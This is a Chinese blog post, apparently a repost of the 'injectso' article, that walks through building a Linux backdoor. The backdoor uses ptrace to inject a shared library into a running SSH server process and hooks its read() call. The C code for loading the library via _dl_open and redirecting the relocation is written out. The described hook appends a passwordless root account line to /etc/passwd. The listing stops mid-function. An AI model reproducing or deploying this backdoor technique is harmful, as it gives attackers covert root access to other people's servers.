linux后门程序利用,利用Linux的共享库编写出injectso后门程序

最新推荐文章于 2022-12-19 21:33:52 发布
最新推荐文章于 2022-12-19 21:33:52 发布
阅读量262 收藏
点赞数
文章标签: linux后门程序利用

下面让我们来写一个简单后门程序。第1步,我们可以调用上面给出的ptrace_attach()完成。第2步,可以通过find_symbol()找到_dl_open的地址。第3步我们可以调用ptrace_call()来调用_dl_open,但是要注意_dl_open定义为’internal_function’,这说明它的传递方式是通过寄存器而不是堆栈,这样看来在调用_dl_open之前还需做一些琐碎的操作,那么我们还是把它封装起来更好。第4步,函数重定向,我们可以通过符号解析函数和RELOCATION地址获取函数找到新老函数地址,地址都已经找到,那替换它们只是一个简单的操作了。第5步,仅仅调用ptrace_detach就可以了。OK,看来所有的步骤我们都可以很轻松的完成了,只有3还需要个小小的封装函数,现在就来完成它:

void call_dl_open(int pid, unsigned long addr, char *libname)

{

void *pRLibName;

struct user_regs_struct regs;

/*

先找个空间存放要装载的共享库名,我们可以简单的把它放入堆栈

*/

pRLibName = ptrace_push(pid, libname, strlen(libname) + 1);

/* 设置参数到寄存器 */

ptrace_readreg(pid, &regs);

regs.eax = (unsigned long) pRLibName;

regs.ecx = 0x0;

regs.edx = RTLD_LAZY;

ptrace_writereg(pid, &regs);

/* 调用_dl_open */

ptrace_call(pid, addr);

puts("call _dl_open ok");

}

到这里所有的基础问题都已经解决(只是相对而言,在有些情况下可能需要解决系统调用或临界区等问题,本文没有涉及,但是我们的程序依然可以很好的执行),现在需要考虑的我们做一个什么样的后门程序。为了简单,我打算作一个注射SSH服务的后门程序。我们只需要重定向read调用到我们自己的newread,并在newread中加入对读取到的内容进行判断的语句,如果发现读到的第一个字节是#号,我们将向/etc/passwd追加新行”a::0:0:root:/root:/bin/sh\n”,这样我们就有了一个具有ROOT权限的用户injso,并且不需要登陆密码。根据这个思路来建立我们的.so

root@Dis9Team:~# gcc -shared -o so.so -fPIC so.c -nostdlib

好了,我们已经有了.so,下面就仅剩下main()了,让我们来看看:

root@Dis9Team:~# cat injso.c

#include

#include

#include

#include "p_elf.h"

#include "p_dbg.h"

int main(int argc, char *argv[])

{

int pid;

struct link_map *map;

char sym_name[256];

unsigned long sym_addr;

unsigned long new_addr,old_addr,rel_addr;

/* 从命令行取得目标进程PID

pid = atoi(argv[1]);

/* 关联到目标进程 */

ptrace_attach(pid);

/* 得到指向link_map链表的指针 */

map = get_linkmap(pid);                    /* get_linkmap */

/* 发现_dl_open,并调用它 */

sym_addr = find_symbol(pid, map, "_dl_open");        /* call _dl_open */

printf("found _dl_open at addr %p\n", sym_addr);

call_dl_open(pid, sym_addr, "/home/grip2/me/so.so");    /* 注意装载的库地址 */

/* 找到我们的新函数newread的地址 */

strcpy(sym_name, "newread");                /* intercept */

sym_addr = find_symbol(pid, map, sym_name);

printf("%s addr\t %p\n", sym_name, sym_addr);

/* 找到read的RELOCATION地址 */

strcpy(sym_name, "read");

rel_addr = find_sym_in_rel(pid, sym_name);

printf("%s rel addr\t %p\n", sym_name, rel_addr);

/* 找到用于保存read地址的指针 */

strcpy(sym_name, "oldread");

old_addr = find_symbol(pid, map, sym_name);

printf("%s addr\t %p\n", sym_name, old_addr);

/* 函数重定向 */

puts("intercept...");                    /* intercept */

ptrace_read(pid, rel_addr, &new_addr, sizeof(new_addr));

ptrace_write(pid, old_addr, &new_addr, sizeof(new_addr));

他们迂回误会
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
玩转ptrace(一)
01-08 5591
by Pradeep PadalaCreated 2002-11-01 02:00翻译: Magic.D E-mail: [email protected]译者序:在开发Hust Online Judge的过程中,查阅了不少资料,关于调试器技术的资料在网上是很少,即便是UNIX编程巨著《UNIX环境高级编程》中,相关内容也不多,直到我在http://www.linuxjournal.c
Linux共享注入后门
kfy2011的专栏
11-28 722
LINUX共享 类似Windows系统中的动态链接Linux中也有相应的共享用以支持代码的复用。Windows中为*.dll,而Linux中为*.so。下 面详细介绍如何创建、使用Linux共享。 一个例子: #include int sayhello( void ) {     printf("hello form sayhello function!/n");
玩转ptrace(一) [z](转帖真的很好)
zgl07的专栏
01-12 705
 玩转ptrace(一) [z]  by Pradeep Padala Created 2002-11-01 02:00翻译: Magic.D E-mail: [email protected]译者序:在开发Hust Online Judge的过程中,查阅了不少资料,关于调试器技术的资料在网上是
注入初始进程 android,[QTA] Android 动态注入原理分析
weixin_33514221的博客
05-30 274
一、前言Android 的 UI 自动化测试可以通过注入式和非注入式分别实现,通过注入式可以更加方便地与应用进行交互。QTA 团队提供的 Android UI 自动化测试框架QT4A, 是通过动态注入的方式来获取被测应用的控件树信息等,从而达到自动化测试的目的。本文主要介绍该动态注入的原理。二、Android 动态注入概述QT4A 中的动态注入是借助 ptrace 函数,该函数常用于断点调试或系统...
linux进程inject,linux-inject:注入代码到运行的Linux进程中
weixin_33907300的博客
04-29 1038
最近,我遇到了linux-inject,它是一个注入程序,可以注入一个.so文件到一个运行中的应用程序进程中。类似于LD_PRELOAD环境变量所实现的功能,但它可以在程序运行过程中进行动态注入,而LD_PRELOAD是定义在程序运行前优先加载的动态链接。事实上,linux-inject并不取代任何功能。换句话说,可以看成是忽略了LP_PRELOAD.它的文档很匮乏,理由可能是开发人员认为大多数...
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit。假如是内核级的木马,那么该方法就无效了)。 因为修改系统内核相对复杂...
简单的Linux查找后门思路和shell脚本分享
09-15
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
linux后门N种姿势.pdf
08-07
前言 后门概述及种类 常见后门功能 Rootkit 发现及检测 后续处理
Linux内核级后门的原理及简单实战
08-10
linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。  内存被分为两个单元: 内核区域和用户区域。(译者注:我觉得还是这样叫比较顺口)内核区域存放并运行着核心代码,当然,顾名思义,用户...
共享注入--injectso实例
pany007的专栏
10-04 851
共享注射--injectso实例作者:grip2 日期:2002/08/16内容:    1 -- 介绍    2 -- injectso -- 共享注射技术    3 -- injectso的工作步骤及实现方法    4 -- 目标进程调试函数    5 -- 符号解析函数    6 -- 一个简单的后门程序    7 -- 最后    8 -- 参考文献 一、 ** 介绍本文介绍的是inj
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
08-21
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
inject.cpp.x64_86.so:在x64_86平台上挂钩共享和虚拟对象的调用
03-06
这是用于x64_86共享和主代码之间的外观和更改调用的。 您还可以将对象与虚拟对象(vtable)挂钩 inject.cpp - main code of injection library inject_user.cpp - code for looking and changin calls inject.h - autogenerated by do script file with description for functions and methods classes - class names for do script for generation inject.h lib.h - define inteface of test library lib.cpp - realisation of test library main.cpp - usage test li
使用injectso技术注入mtrace,对进程进行内存检测
joy
05-31 966
在开发过程中,我们可以在程序中调用mtrace函数,来对内存管理进行跟踪。可如果已经编译好的程序,我们该如何进行跟踪呢?        这里,我们可以采用injectso技术,在程序外面使被跟踪的程序调用mtrace,来实现。    因为mtrace属于libc最基本的,所以不必采用_dl_open来载入相应的。            主要参考    http://blog.chinaunix
Intel平台下Linux中ELF文件动态链接的加载、解析及实例分析(一): 加载
11-14 2039
动态链接,一个经常被人提起的话题。但在这方面很少有文章来阐明这个重要的软件运行机制,只有一些关于动态链接编程的文章。本系列文章就是要从动态链接源代码的层次来探讨这个问题。当然从文章的题目就可以看出,intel平台下的linux ELF文件的动态链接。一则是因为这一方面的资料查找比较方便,二则也是这个讨论的意思比其它的动态链接要更为重要(毕竟现在是intel的天下)。当然,有了这么一个例子,
linux共享编译指令,如何进行Linux平台共享替换
weixin_35679813的博客
05-01 336
*本文原创作者:gaearrow,本文属FreeBuf原创奖励计划,未经许可禁止转载。共享基础知识程序由源代码变成可执行文件,一般可以分解为四个步骤,分别是预处理(Prepressing)、编译(Compilation)、汇编(Assembly)和链接(Linking)。预处理过程主要处理源代码中以“#”开始的预编译指令;编译过程把预处理完成的文件进行词法、语法、语义等分析并产生相应的汇编代码文...
内核符号之获得内核符号地址1__symbol_get
yldfree的博客
07-02 3189
void *__symbol_get(const char * symbol)symbol: 符号名ret:    符号的地址,不存在则返回空头文件: #include  <linux/module.h>
模块的加载过程三
weixin_52849254的博客
12-19 867
这种情况下simplify_symbols函数会调用resolve_symbol函数来处理该未定义符号,后者会调用find_symbol函数去查找该符号(详细的查找过程见本章前面的"find_symbol函数”部分),如果找到了,就把它在内存中的实际地址赋值给st_valueo如此,经过simplify_symbols函数的调用之后,内核模块符号表中的所有符号就都有了正确的st_value值,也即都有了正确的内存地址。这是个很严重的问题。如此,内核模块导出符号的地址在系统执行完重定位之后被更新为正确的值。
Android ptrace进程注入原理
欢迎关注微信公众号:DroidMind
08-17 9352
一、ptrace函数介绍 ptrace函数的原型如下所示,其中request为行为参数,该参数决定了ptrace函数的行为,pid参数为远程进程的ID,addr参数与data参数在不同的request参数取值下表示不同的含义。 long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data); 部分...
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
rootkit后门程序具有哪些特点?
06-12
rootkit 后门程序具有以下特点: 1. 隐藏性强:rootkit 后门程序可以隐藏自己的存在,使它们不被常规安全软件检测到。 2. 持久性强:rootkit 后门程序可以在系统启动时自动运行,并且可以通过修改系统文件等方式来保持持久性。 3. 特权级别高:rootkit 后门程序通常拥有系统管理员或更高的特权级别,可以绕过操作系统的安全机制,执行恶意操作。 4. 远程控制:rootkit 后门程序可以远程控制受感染的计算机,例如,通过远程命令行、文件传输、远程桌面等方式。 5. 数据窃取:rootkit 后门程序可以窃取密码、信用卡信息、个人隐私等敏感信息,导致用户信息泄露和财产损失。 6. 多样性:rootkit 后门程序有多种类型,包括内核级 rootkit、应用程序级 rootkit、硬件级 rootkit、固件级 rootkit 等,每种类型均有其独特的攻击方式和特点。 因此,rootkit 后门程序对计算机安全构成了严重的威胁,需要采取多种手段进行检测和防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值